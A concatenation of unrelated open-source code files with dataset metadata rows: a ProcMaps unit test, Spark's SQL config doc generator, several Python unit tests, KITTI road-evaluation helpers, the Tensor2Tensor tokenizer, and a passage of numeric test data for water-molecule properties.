def test_executable(self):
maps = ProcMaps.load(cStringIO.StringIO(self._TEST_PROCMAPS))
selected = [3, 6]
for index, entry in enumerate(maps.iter(ProcMaps.executable)):
self.assertEqual(entry.as_dict(),
self._expected_as_dict(selected[index]))
def test_executable_and_constants(self):
maps = ProcMaps.load(cStringIO.StringIO(self._TEST_PROCMAPS))
selected = [3, 4, 6, 7]
for index, entry in enumerate(maps.iter(ProcMaps.executable_and_constants)):
self.assertEqual(entry.as_dict(),
self._expected_as_dict(selected[index]))
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG if '-v' in sys.argv else logging.ERROR,
format='%(levelname)5s %(filename)15s(%(lineno)3d): %(message)s')
unittest.main()
| bsd-3-clause | -4,947,077,876,686,821,000 | 40.918182 | 80 | 0.574279 | false |
wangyum/spark | sql/gen-sql-config-docs.py | 15 | 4773 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import re
from collections import namedtuple
from textwrap import dedent
# To avoid adding a new direct dependency, we import markdown from within mkdocs.
from mkdocs.structure.pages import markdown
from pyspark.java_gateway import launch_gateway
SQLConfEntry = namedtuple(
"SQLConfEntry", ["name", "default", "description", "version"])
def get_sql_configs(jvm, group):
if group == "static":
config_set = jvm.org.apache.spark.sql.api.python.PythonSQLUtils.listStaticSQLConfigs()
else:
config_set = jvm.org.apache.spark.sql.api.python.PythonSQLUtils.listRuntimeSQLConfigs()
sql_configs = [
SQLConfEntry(
name=_sql_config._1(),
default=_sql_config._2(),
description=_sql_config._3(),
version=_sql_config._4()
)
for _sql_config in config_set
]
return sql_configs
def generate_sql_configs_table_html(sql_configs, path):
"""
Generates an HTML table at `path` that lists all public SQL
configuration options.
The table will look something like this:
```html
<table class="table">
<tr><th>Property Name</th><th>Default</th><th>Meaning</th><th>Since Version</th></tr>
<tr>
<td><code>spark.sql.adaptive.enabled</code></td>
<td>false</td>
<td><p>When true, enable adaptive query execution.</p></td>
<td>2.1.0</td>
</tr>
...
</table>
```
"""
value_reference_pattern = re.compile(r"^<value of (\S*)>$")
with open(path, 'w') as f:
f.write(dedent(
"""
<table class="table">
<tr><th>Property Name</th><th>Default</th><th>Meaning</th><th>Since Version</th></tr>
"""
))
for config in sorted(sql_configs, key=lambda x: x.name):
if config.name == "spark.sql.session.timeZone":
default = "(value of local timezone)"
elif config.name == "spark.sql.warehouse.dir":
default = "(value of <code>$PWD/spark-warehouse</code>)"
elif config.default == "<undefined>":
default = "(none)"
elif config.default.startswith("<value of "):
referenced_config_name = value_reference_pattern.match(config.default).group(1)
default = "(value of <code>{}</code>)".format(referenced_config_name)
else:
default = config.default
if default.startswith("<"):
raise Exception(
"Unhandled reference in SQL config docs. Config '{name}' "
"has default '{default}' that looks like an HTML tag."
.format(
name=config.name,
default=config.default,
)
)
f.write(dedent(
"""
<tr>
<td><code>{name}</code></td>
<td>{default}</td>
<td>{description}</td>
<td>{version}</td>
</tr>
"""
.format(
name=config.name,
default=default,
description=markdown.markdown(config.description),
version=config.version
)
))
f.write("</table>\n")
if __name__ == "__main__":
jvm = launch_gateway().jvm
docs_root_dir = os.path.join(os.path.dirname(os.path.dirname(__file__)), "docs")
sql_configs = get_sql_configs(jvm, "runtime")
sql_configs_table_path = os.path.join(docs_root_dir, "generated-runtime-sql-config-table.html")
generate_sql_configs_table_html(sql_configs, path=sql_configs_table_path)
sql_configs = get_sql_configs(jvm, "static")
sql_configs_table_path = os.path.join(docs_root_dir, "generated-static-sql-config-table.html")
generate_sql_configs_table_html(sql_configs, path=sql_configs_table_path)
| apache-2.0 | -6,565,091,840,375,546,000 | 34.355556 | 99 | 0.586424 | false |
lybicat/lybica-runner | tst/test_lybica/actions/user_script.py | 1 | 1597 | from unittest import TestCase
from lybica.actions.user_script import _UserScriptAction
from lybica.__main__ import Context
import os
import shutil
class TestUserScriptAction(TestCase):
def setUp(self):
super(TestUserScriptAction, self).setUp()
self.context = Context()
os.environ['WORKSPACE'] = './ut_logs'
self.context.WORKSPACE = './ut_logs'
os.makedirs(self.context.WORKSPACE)
def tearDown(self):
if os.path.exists(self.context.WORKSPACE):
shutil.rmtree(self.context.WORKSPACE)
def test_run_do_ut_action_under_case_root(self):
os.environ['CASE_ROOT'] = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'testsuite'))
class _Action(_UserScriptAction):
def get_script_name(self):
return 'do_ut'
_Action()._run_script(self.context, {})
def test_run_do_lybica_ut_action_under_lybica_directory(self):
os.environ['CASE_ROOT'] = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'testsuite'))
class _Action(_UserScriptAction):
def get_script_name(self):
return 'do_lybica_ut'
_Action()._run_script(self.context, {})
def test_run_do_undefined_action(self):
os.environ['CASE_ROOT'] = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'testsuite'))
class _Action(_UserScriptAction):
def get_script_name(self):
return 'do_undefined'
self.assertRaises(RuntimeError, _Action()._run_script, self.context, {})
| mit | 5,165,583,143,240,525,000 | 37.02381 | 115 | 0.617408 | false |
kellyaj/pytactoe | pytactoe/test/test_computer.py | 1 | 3921 | import unittest
from mock import MagicMock
from pytactoe.board import Board
from pytactoe.computer import Computer
class ComputerTests(unittest.TestCase):
def setUp(self):
self.computer = Computer("O")
self.board = Board()
def test_computer_initializes_with_a_mark(self):
self.assertEqual("O", self.computer.mark)
def test_checking_first_move(self):
self.assertTrue(self.computer.is_first_move(self.board))
self.board.spots = [1, 2, 3, 4, "O", 6, 7, 8, 9]
self.assertFalse(self.computer.is_first_move(self.board))
self.board.spots =[1, "X", "X", "O", "X", "O", "O", "O", "X"]
self.assertFalse(self.computer.is_first_move(self.board))
class ComputerMoveChoiceTests(unittest.TestCase):
def setUp(self):
self.computer = Computer("O")
self.board = Board()
self.mock_presenter = MagicMock()
self.mock_presenter.computer_move_message = MagicMock()
def test_computer_chooses_moves_from_available_spots(self):
self.board.spots =[1, "X", "X", "O", "X", "O", "O", "O", "X"]
available_spots = self.board.available_spots()
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertTrue(chosen_move in self.board.spots)
def test_computer_choses_first_move_optimally(self):
optimal_moves = [1, 3, 5, 7, 9]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertTrue(chosen_move in optimal_moves)
def test_computer_chooses_obvious_win(self):
self.board.spots =[1, "X", "X", "O", "X", "O", "O", "O", "X"]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(1, chosen_move)
def test_computer_chooses_winning_row_move(self):
self.board.spots = ["X", "X", 3, 4, "X", 6, 7, "O", "O"]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(7, chosen_move)
def test_computer_chooses_winning_column_move(self):
self.board.spots = ["X", 2, "O", "X", "O", 6, 7, 8, 9]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(7, chosen_move)
def test_computer_chooses_winning_diagonal_move(self):
self.board.spots = [1, 2, "X", 4, "X", "O", "O", "O", "X"]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(1, chosen_move)
def test_computer_takes_win_over_block(self):
self.board.spots = ["X", "X", 3, 4, "X", 6, "O", "O", 9]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(9, chosen_move)
def test_computer_takes_win_over_fork(self):
self.board.spots = ["X", 2, "X", "O", "O", 6, "X", 8, 9]
chosen_move = self.computer.get_move(self.mock_presenter, self.board)
self.assertEqual(6, chosen_move)
class ScoreMoveTests(unittest.TestCase):
def setUp(self):
self.computer = Computer("X")
self.board = Board()
self.winning_spots = ["X", "X", 3, 4, "X", 6, "O", "O", "O"]
def test_stalemates_are_scored_as_zero(self):
stalemated_board = ["X", "O", "O", "O", "X", "X", "X", "X", "O"]
self.board.spots = stalemated_board
score = self.computer.score_move(self.board, "X", 1)
self.assertEqual(score, 0)
def test_wins_are_score_as_one(self):
self.board.spots = self.winning_spots
score = self.computer.score_move(self.board, "X", 1)
self.assertEqual(score, -1)
def test_lower_depths_received_higher_scores(self):
self.board.spots = self.winning_spots
low_depth_score = -(self.computer.score_move(self.board, "X", 1))
high_depth_score = -(self.computer.score_move(self.board, "X", 2))
self.assertTrue(low_depth_score > high_depth_score)
| mit | -2,769,153,688,733,761,000 | 36.701923 | 77 | 0.616424 | false |
mrtukkin/svm-street-detector | devkit_kitti/helper.py | 1 | 12022 | #!/usr/bin/env python
#
# THE KITTI VISION BENCHMARK SUITE: ROAD BENCHMARK
#
# Copyright (C) 2013
# Honda Research Institute Europe GmbH
# Carl-Legien-Str. 30
# 63073 Offenbach/Main
# Germany
#
# UNPUBLISHED PROPRIETARY MATERIAL.
# ALL RIGHTS RESERVED.
#
# Authors: Tobias Kuehnl <[email protected]>
# Jannik Fritsch <[email protected]>
#
import numpy as np
import pylab
import os
import cv2
def getGroundTruth(fileNameGT):
'''
Returns the ground truth maps for roadArea and the validArea
:param fileNameGT:
'''
# Read GT
assert os.path.isfile(fileNameGT), 'Cannot find: %s' % fileNameGT
full_gt = cv2.imread(fileNameGT, cv2.CV_LOAD_IMAGE_UNCHANGED)
#attention: OpenCV reads in as BGR, so first channel has Blue / road GT
roadArea = full_gt[:,:,0] > 0
validArea = full_gt[:,:,2] > 0
return roadArea, validArea
def overlayImageWithConfidence(in_image, conf, vis_channel = 1, threshold = 0.5):
'''
:param in_image:
:param conf:
:param vis_channel:
:param threshold:
'''
if in_image.dtype == 'uint8':
visImage = in_image.copy().astype('f4')/255
else:
visImage = in_image.copy()
channelPart = visImage[:, :, vis_channel] * (conf > threshold) - conf
channelPart[channelPart < 0] = 0
visImage[:, :, vis_channel] = visImage[:, :, vis_channel] * (conf <= threshold) + (conf > threshold) * conf + channelPart
return visImage
def evalExp(gtBin, cur_prob, thres, validMap = None, validArea=None):
'''
Does the basic pixel based evaluation!
:param gtBin:
:param cur_prob:
:param thres:
:param validMap:
'''
assert len(cur_prob.shape) == 2, 'Wrong size of input prob map'
assert len(gtBin.shape) == 2, 'Wrong size of input prob map'
thresInf = np.concatenate(([-np.Inf], thres, [np.Inf]))
#Merge validMap with validArea
if validMap!=None:
if validArea!=None:
validMap = (validMap == True) & (validArea == True)
elif validArea!=None:
validMap=validArea
# histogram of false negatives
if validMap!=None:
fnArray = cur_prob[(gtBin == True) & (validMap == True)]
else:
fnArray = cur_prob[(gtBin == True)]
fnHist = np.histogram(fnArray,bins=thresInf)[0]
fnCum = np.cumsum(fnHist)
FN = fnCum[0:0+len(thres)];
if validMap!=None:
fpArray = cur_prob[(gtBin == False) & (validMap == True)]
else:
fpArray = cur_prob[(gtBin == False)]
fpHist = np.histogram(fpArray, bins=thresInf)[0]
fpCum = np.flipud(np.cumsum(np.flipud(fpHist)))
FP = fpCum[1:1+len(thres)]
# count labels and protos
#posNum = fnArray.shape[0]
#negNum = fpArray.shape[0]
if validMap!=None:
posNum = np.sum((gtBin == True) & (validMap == True))
negNum = np.sum((gtBin == False) & (validMap == True))
else:
posNum = np.sum(gtBin == True)
negNum = np.sum(gtBin == False)
return FN, FP, posNum, negNum
def pxEval_maximizeFMeasure(totalPosNum, totalNegNum, totalFN, totalFP, thresh = None):
'''
@param totalPosNum: scalar
@param totalNegNum: scalar
@param totalFN: vector
@param totalFP: vector
@param thresh: vector
'''
#Calc missing stuff
totalTP = totalPosNum - totalFN
totalTN = totalNegNum - totalFP
valid = (totalTP>=0) & (totalTN>=0)
assert valid.all(), 'Detected invalid elements in eval'
recall = totalTP / float( totalPosNum )
precision = totalTP / (totalTP + totalFP + 1e-10)
selector_invalid = (recall==0) & (precision==0)
recall = recall[~selector_invalid]
precision = precision[~selector_invalid]
maxValidIndex = len(precision)
#Pascal VOC average precision
AvgPrec = 0
counter = 0
for i in np.arange(0,1.1,0.1):
ind = np.where(recall>=i)
if ind == None:
continue
pmax = max(precision[ind])
AvgPrec += pmax
counter += 1
AvgPrec = AvgPrec/counter
# F-measure operation point
beta = 1.0
betasq = beta**2
F = (1 + betasq) * (precision * recall)/((betasq * precision) + recall + 1e-10)
index = F.argmax()
MaxF= F[index]
recall_bst = recall[index]
precision_bst = precision[index]
TP = totalTP[index]
TN = totalTN[index]
FP = totalFP[index]
FN = totalFN[index]
valuesMaxF = np.zeros((1,4),'u4')
valuesMaxF[0,0] = TP
valuesMaxF[0,1] = TN
valuesMaxF[0,2] = FP
valuesMaxF[0,3] = FN
#ACC = (totalTP+ totalTN)/(totalPosNum+totalNegNum)
prob_eval_scores = calcEvalMeasures(valuesMaxF)
prob_eval_scores['AvgPrec'] = AvgPrec
prob_eval_scores['MaxF'] = MaxF
#prob_eval_scores['totalFN'] = totalFN
#prob_eval_scores['totalFP'] = totalFP
prob_eval_scores['totalPosNum'] = totalPosNum
prob_eval_scores['totalNegNum'] = totalNegNum
prob_eval_scores['precision'] = precision
prob_eval_scores['recall'] = recall
#prob_eval_scores['precision_bst'] = precision_bst
#prob_eval_scores['recall_bst'] = recall_bst
prob_eval_scores['thresh'] = thresh
if thresh != None:
BestThresh= thresh[index]
prob_eval_scores['BestThresh'] = BestThresh
#return a dict
return prob_eval_scores
def calcEvalMeasures(evalDict, tag = '_wp'):
'''
:param evalDict:
:param tag:
'''
# array mode!
TP = evalDict[:,0].astype('f4')
TN = evalDict[:,1].astype('f4')
FP = evalDict[:,2].astype('f4')
FN = evalDict[:,3].astype('f4')
Q = TP / (TP + FP + FN)
P = TP + FN
N = TN + FP
TPR = TP / P
FPR = FP / N
FNR = FN / P
TNR = TN / N
A = (TP + TN) / (P + N)
precision = TP / (TP + FP)
recall = TP / P
#numSamples = TP + TN + FP + FN
correct_rate = A
# F-measure
#beta = 1.0
#betasq = beta**2
#F_max = (1 + betasq) * (precision * recall)/((betasq * precision) + recall + 1e-10)
outDict =dict()
outDict['TP'+ tag] = TP
outDict['FP'+ tag] = FP
outDict['FN'+ tag] = FN
outDict['TN'+ tag] = TN
outDict['Q'+ tag] = Q
outDict['A'+ tag] = A
outDict['TPR'+ tag] = TPR
outDict['FPR'+ tag] = FPR
outDict['FNR'+ tag] = FNR
outDict['PRE'+ tag] = precision
outDict['REC'+ tag] = recall
outDict['correct_rate'+ tag] = correct_rate
return outDict
def setFigLinesBW(fig):
"""
Take each axes in the figure, and for each line in the axes, make the
line viewable in black and white.
"""
for ax in fig.get_axes():
setAxLinesBW(ax)
def setAxLinesBW(ax):
"""
Take each Line2D in the axes, ax, and convert the line style to be
suitable for black and white viewing.
"""
MARKERSIZE = 3
# COLORMAP = {
# 'r': {'marker': None, 'dash': (None,None)},
# 'g': {'marker': None, 'dash': [5,2]},
# 'm': {'marker': None, 'dash': [11,3]},
# 'b': {'marker': None, 'dash': [6,3,2,3]},
# 'c': {'marker': None, 'dash': [1,3]},
# 'y': {'marker': None, 'dash': [5,3,1,2,1,10]},
# 'k': {'marker': 'o', 'dash': (None,None)} #[1,2,1,10]}
# }
COLORMAP = {
'r': {'marker': "None", 'dash': ("None","None")},
'g': {'marker': "None", 'dash': [5,2]},
'm': {'marker': "None", 'dash': [11,3]},
'b': {'marker': "None", 'dash': [6,3,2,3]},
'c': {'marker': "None", 'dash': [1,3]},
'y': {'marker': "None", 'dash': [5,3,1,2,1,10]},
'k': {'marker': 'o', 'dash': ("None","None")} #[1,2,1,10]}
}
for line in ax.get_lines():
origColor = line.get_color()
#line.set_color('black')
line.set_dashes(COLORMAP[origColor]['dash'])
line.set_marker(COLORMAP[origColor]['marker'])
line.set_markersize(MARKERSIZE)
def plotPrecisionRecall(precision, recall, outFileName, Fig=None, drawCol=1, textLabel = None, title = None, fontsize1 = 24, fontsize2 = 20, linewidth = 3):
'''
:param precision:
:param recall:
:param outFileName:
:param Fig:
:param drawCol:
:param textLabel:
:param fontsize1:
:param fontsize2:
:param linewidth:
'''
clearFig = False
if Fig == None:
Fig = pylab.figure()
clearFig = True
#tableString = 'Algo avgprec Fmax prec recall accuracy fpr Q(TonITS)\n'
linecol = ['g','m','b','c']
#if we are evaluating SP, then BL is available
#sectionName = 'Evaluation_'+tag+'PxProb'
#fullEvalFile = os.path.join(eval_dir,evalName)
#Precision,Recall,evalString = readEvaluation(fullEvalFile,sectionName,AlgoLabel)
pylab.plot(100*recall, 100*precision, linewidth=linewidth, color=linecol[drawCol], label=textLabel)
#writing out PrecRecall curves as graphic
setFigLinesBW(Fig)
if textLabel!= None:
pylab.legend(loc='lower left',prop={'size':fontsize2})
if title!= None:
pylab.title(title, fontsize=fontsize1)
#pylab.title(title,fontsize=24)
pylab.ylabel('PRECISION [%]',fontsize=fontsize1)
pylab.xlabel('RECALL [%]',fontsize=fontsize1)
pylab.xlim(0,100)
pylab.xticks( [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100],
('0','','20','','40','','60','','80','','100'), fontsize=fontsize2 )
pylab.ylim(0,100)
pylab.yticks( [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100],
('0','','20','','40','','60','','80','','100'), fontsize=fontsize2 )
pylab.grid(True)
#
if type(outFileName) != list:
pylab.savefig( outFileName )
else:
for outFn in outFileName:
pylab.savefig( outFn )
if clearFig:
pylab.close()
Fig.clear()
def saveBEVImageWithAxes(data, outputname, cmap = None, xlabel = 'x [m]', ylabel = 'z [m]', rangeX = [-10, 10], rangeXpx = None, numDeltaX = 5, rangeZ = [7, 62], rangeZpx = None, numDeltaZ = 5, fontSize = 16):
'''
:param data:
:param outputname:
:param cmap:
'''
aspect_ratio = float(data.shape[1])/data.shape[0]
fig = pylab.figure()
Scale = 8
# add +1 to get axis text
fig.set_size_inches(Scale*aspect_ratio+1,Scale*1)
ax = pylab.gca()
#ax.set_axis_off()
#fig.add_axes(ax)
if cmap != None:
pylab.set_cmap(cmap)
#ax.imshow(data, interpolation='nearest', aspect = 'normal')
ax.imshow(data, interpolation='nearest')
if rangeXpx == None:
rangeXpx = (0, data.shape[1])
if rangeZpx == None:
rangeZpx = (0, data.shape[0])
modBev_plot(ax, rangeX, rangeXpx, numDeltaX, rangeZ, rangeZpx, numDeltaZ, fontSize, xlabel = xlabel, ylabel = ylabel)
#plt.savefig(outputname, bbox_inches='tight', dpi = dpi)
pylab.savefig(outputname, dpi = data.shape[0]/Scale)
pylab.close()
fig.clear()
def modBev_plot(ax, rangeX = [-10, 10 ], rangeXpx= [0, 400], numDeltaX = 5, rangeZ= [8,48 ], rangeZpx= [0, 800], numDeltaZ = 9, fontSize = None, xlabel = 'x [m]', ylabel = 'z [m]'):
'''
@param ax:
'''
#TODO: Configureabiltiy would be nice!
if fontSize==None:
fontSize = 8
ax.set_xlabel(xlabel, fontsize=fontSize)
ax.set_ylabel(ylabel, fontsize=fontSize)
zTicksLabels_val = np.linspace(rangeZpx[0], rangeZpx[1], numDeltaZ)
ax.set_yticks(zTicksLabels_val)
#ax.set_yticks([0, 100, 200, 300, 400, 500, 600, 700, 800])
xTicksLabels_val = np.linspace(rangeXpx[0], rangeXpx[1], numDeltaX)
ax.set_xticks(xTicksLabels_val)
xTicksLabels_val = np.linspace(rangeX[0], rangeX[1], numDeltaX)
zTicksLabels = map(lambda x: str(int(x)), xTicksLabels_val)
ax.set_xticklabels(zTicksLabels,fontsize=fontSize)
zTicksLabels_val = np.linspace(rangeZ[1],rangeZ[0], numDeltaZ)
zTicksLabels = map(lambda x: str(int(x)), zTicksLabels_val)
ax.set_yticklabels(zTicksLabels,fontsize=fontSize)
| gpl-3.0 | 2,271,872,404,286,744,000 | 29.437975 | 209 | 0.58551 | false |
mlperf/training_results_v0.6 | Google/benchmarks/transformer/implementations/tpu-v3-256-transformer/dataset_preproc/data_generators/tokenizer.py | 7 | 6150 | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple invertible tokenizer.
Converts from a unicode string to a list of tokens
(represented as Unicode strings).
This tokenizer has the following desirable properties:
- It is invertible.
- Alphanumeric characters are broken away from non-alphanumeric characters.
- A single space between words does not produce an extra token.
- The full Unicode punctuation and separator set is recognized.
The tokenization algorithm is as follows:
1. Split the text into a list of tokens, splitting at every boundary of an
alphanumeric character and a non-alphanumeric character. This produces
a list which alternates between "alphanumeric tokens"
(strings of alphanumeric characters) and "non-alphanumeric tokens"
(strings of non-alphanumeric characters).
2. Remove every token consisting of a single space, unless it is
the very first or very last token in the list. These tokens are now
implied by the fact that there are two adjacent alphanumeric tokens.
e.g. u"Dude - that's so cool."
-> [u"Dude", u" - ", u"that", u"'", u"s", u"so", u"cool", u"."]
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import sys
import unicodedata
import six
from six.moves import range # pylint: disable=redefined-builtin
import tensorflow as tf
# Conversion between Unicode and UTF-8, if required (on Python2)
_native_to_unicode = (lambda s: s.decode("utf-8")) if six.PY2 else (lambda s: s)
# This set contains all letter and number characters.
_ALPHANUMERIC_CHAR_SET = set(
six.unichr(i) for i in range(sys.maxunicode)
if (unicodedata.category(six.unichr(i)).startswith("L") or
unicodedata.category(six.unichr(i)).startswith("N")))
def encode(text):
"""Encode a unicode string as a list of tokens.
Args:
text: a unicode string
Returns:
a list of tokens as Unicode strings
"""
if not text:
return []
ret = []
token_start = 0
# Classify each character in the input string
is_alnum = [c in _ALPHANUMERIC_CHAR_SET for c in text]
for pos in range(1, len(text)):
if is_alnum[pos] != is_alnum[pos - 1]:
token = text[token_start:pos]
if token != u" " or token_start == 0:
ret.append(token)
token_start = pos
final_token = text[token_start:]
ret.append(final_token)
return ret
def decode(tokens):
"""Decode a list of tokens to a unicode string.
Args:
tokens: a list of Unicode strings
Returns:
a unicode string
"""
token_is_alnum = [t[0] in _ALPHANUMERIC_CHAR_SET for t in tokens]
ret = []
for i, token in enumerate(tokens):
if i > 0 and token_is_alnum[i - 1] and token_is_alnum[i]:
ret.append(u" ")
ret.append(token)
return "".join(ret)
def _read_filepattern(filepattern, max_lines=None, split_on_newlines=True):
"""Reads files matching a wildcard pattern, yielding the contents.
Args:
filepattern: A wildcard pattern matching one or more files.
max_lines: If set, stop reading after reading this many lines.
split_on_newlines: A boolean. If true, then split files by lines and strip
leading and trailing whitespace from each line. Otherwise, treat each
file as a single string.
Yields:
The contents of the files as lines, if split_on_newlines is True, or
the entire contents of each file if False.
"""
filenames = sorted(tf.gfile.Glob(filepattern))
lines_read = 0
for filename in filenames:
with tf.gfile.Open(filename) as f:
if split_on_newlines:
for line in f:
yield line.strip()
lines_read += 1
if max_lines and lines_read >= max_lines:
return
else:
if max_lines:
doc = []
for line in f:
doc.append(line)
lines_read += 1
if max_lines and lines_read >= max_lines:
yield "".join(doc)
return
yield "".join(doc)
else:
yield f.read()
def corpus_token_counts(
text_filepattern, corpus_max_lines, split_on_newlines=True):
"""Read the corpus and compute a dictionary of token counts.
Args:
text_filepattern: A pattern matching one or more files.
corpus_max_lines: An integer; maximum total lines to read.
split_on_newlines: A boolean. If true, then split files by lines and strip
leading and trailing whitespace from each line. Otherwise, treat each
file as a single string.
Returns:
a dictionary mapping token to count.
"""
counts = collections.Counter()
for doc in _read_filepattern(
text_filepattern,
max_lines=corpus_max_lines,
split_on_newlines=split_on_newlines):
counts.update(encode(_native_to_unicode(doc)))
return counts
def vocab_token_counts(text_filepattern, max_lines):
"""Read a vocab file and return a dictionary of token counts.
Reads a two-column CSV file of tokens and their frequency in a dataset. The
tokens are presumed to be generated by encode() or the equivalent.
Args:
text_filepattern: A pattern matching one or more files.
max_lines: An integer; maximum total lines to read.
Returns:
a dictionary mapping token to count.
"""
ret = {}
for i, line in enumerate(
_read_filepattern(text_filepattern, max_lines=max_lines)):
if "," not in line:
tf.logging.warning("Malformed vocab line #%d '%s'", i, line)
continue
token, count = line.rsplit(",", 1)
ret[_native_to_unicode(token)] = int(count)
return ret
| apache-2.0 | 5,644,124,542,219,106,000 | 30.865285 | 80 | 0.68374 | false |
fishstamp82/loprop | test/h2o_data.py | 2 | 11431 | from ..daltools.util.full import init
Z = [8., 1., 1.]
Rc = init([0.00000000, 0.00000000, 0.48860959])
Dtot = [0, 0, -0.76539388]
Daa = init([
[ 0.00000000, 0.00000000, -0.28357300],
[ 0.15342658, 0.00000000, 0.12734703],
[-0.15342658, 0.00000000, 0.12734703],
])
QUc = init([-7.31176220, 0., 0., -5.43243232, 0., -6.36258665])
QUN = init([4.38968295, 0., 0., 0., 0., 1.75400326])
QUaa = init([
[-3.29253618, 0.00000000, 0.00000000, -4.54316657, 0.00000000, -4.00465380],
[-0.13213704, 0.00000000, 0.24980518, -0.44463288, 0.00000000, -0.26059139],
[-0.13213704, 0.00000000,-0.24980518, -0.44463288, 0.00000000, -0.26059139]
])
Fab = init([
[-0.11E-03, 0.55E-04, 0.55E-04],
[ 0.55E-04, -0.55E-04, 0.16E-30],
[ 0.55E-04, 0.16E-30, -0.55E-04]
])
Lab = init([
[0.11E-03, 0.28E-03, 0.28E-03],
[0.28E-03, 0.17E-03, 0.22E-03],
[0.28E-03, 0.22E-03, 0.17E-03]
])
la = init([
[0.0392366,-27.2474016 , 27.2081650],
[0.0358964, 27.2214515 ,-27.2573479],
[0.01211180, -0.04775576, 0.03564396],
[0.01210615, -0.00594030, -0.00616584],
[10.69975088, -5.34987556, -5.34987532],
[-10.6565582, 5.3282791 , 5.3282791]
])
O = [
0.76145382,
-0.00001648, 1.75278523,
-0.00007538, 0.00035773, 1.39756345
]
H1O = [
3.11619527,
0.00019911, 1.25132346,
2.11363325, 0.00111442, 2.12790474
]
H1 = [
0.57935224,
0.00018083, 0.43312326,
0.11495546, 0.00004222, 0.45770123
]
H2O = [
3.11568759,
0.00019821, 1.25132443,
-2.11327482, -0.00142746, 2.12790473
]
H2H1 = [
0.04078206,
-0.00008380, -0.01712262,
-0.00000098, 0.00000084, -0.00200285
]
H2 = [
0.57930522,
0.00018221, 0.43312149,
-0.11493635, -0.00016407, 0.45770123
]
Aab = init([O, H1O, H1, H2O, H2H1, H2])
Aa = init([
[ 3.87739525, 0.00018217, 3.00410918, 0.00010384, 0.00020122, 3.52546819 ],
[ 2.15784091, 0.00023848, 1.05022368, 1.17177159, 0.00059985, 1.52065218 ],
[ 2.15754005, 0.00023941, 1.05022240, -1.17157425, -0.00087738, 1.52065217 ]
])
ff = 0.001
rMP = init([
#O
[
[-8.70343886, 0.00000000, 0.00000000, -0.39827574, -3.68114747, 0.00000000, 0.00000000, -4.58632761, 0.00000000, -4.24741556],
[-8.70343235, 0.00076124, 0.00000000, -0.39827535, -3.68114147, 0.00000000, 0.00193493, -4.58631888, 0.00000000, -4.24741290],
[-8.70343291,-0.00076166, 0.00000000, -0.39827505, -3.68114128, 0.00000000, -0.00193603, -4.58631789, 0.00000000, -4.24741229],
[-8.70343685,-0.00000006, 0.00175241, -0.39827457, -3.68114516, 0.00000000, 0.00000161, -4.58632717, 0.00053363, -4.24741642],
[-8.70343685, 0.00000000, -0.00175316, -0.39827456, -3.68114514, 0.00000000, 0.00000000, -4.58632711, -0.00053592, -4.24741639],
[-8.70166502, 0.00000000, 0.00000144, -0.39688042, -3.67884999, 0.00000000, 0.00000000, -4.58395384, 0.00000080, -4.24349307],
[-8.70520554, 0.00000000, 0.00000000, -0.39967554, -3.68344246, 0.00000000, 0.00000000, -4.58868836, 0.00000000, -4.25134640],
],
#H1O
[
[ 0.00000000, 0.10023328, 0.00000000, 0.11470275, 0.53710687, 0.00000000, 0.43066796, 0.04316104, 0.00000000, 0.36285790],
[ 0.00150789, 0.10111974, 0.00000000, 0.11541803, 0.53753360, 0.00000000, 0.43120945, 0.04333774, 0.00000000, 0.36314215],
[-0.00150230, 0.09934695, 0.00000000, 0.11398581, 0.53667861, 0.00000000, 0.43012612, 0.04298361, 0.00000000, 0.36257249],
[ 0.00000331, 0.10023328, 0.00125017, 0.11470067, 0.53710812, -0.00006107, 0.43066944, 0.04316020, 0.00015952, 0.36285848],
[ 0.00000100, 0.10023249, -0.00125247, 0.11470042, 0.53710716, 0.00006135, 0.43066837, 0.04316018, -0.00015966, 0.36285788],
[ 0.00088692, 0.10059268, -0.00000064, 0.11590322, 0.53754715, -0.00000006, 0.43071206, 0.04334198, -0.00000015, 0.36330053],
[-0.00088334, 0.09987383, 0.00000000, 0.11350091, 0.53666602, 0.00000000, 0.43062352, 0.04297910, 0.00000000, 0.36241326],
],
#H1
[
[-0.64828057, 0.10330994, 0.00000000, 0.07188960, -0.47568174, 0.00000000, -0.03144252, -0.46920879, 0.00000000, -0.50818752],
[-0.64978846, 0.10389186, 0.00000000, 0.07204462, -0.47729337, 0.00000000, -0.03154159, -0.47074619, 0.00000000, -0.50963693],
[-0.64677827, 0.10273316, 0.00000000, 0.07173584, -0.47408263, 0.00000000, -0.03134407, -0.46768337, 0.00000000, -0.50674873],
[-0.64828388, 0.10331167, 0.00043314, 0.07189029, -0.47568875, -0.00023642, -0.03144270, -0.46921635, -0.00021728, -0.50819386],
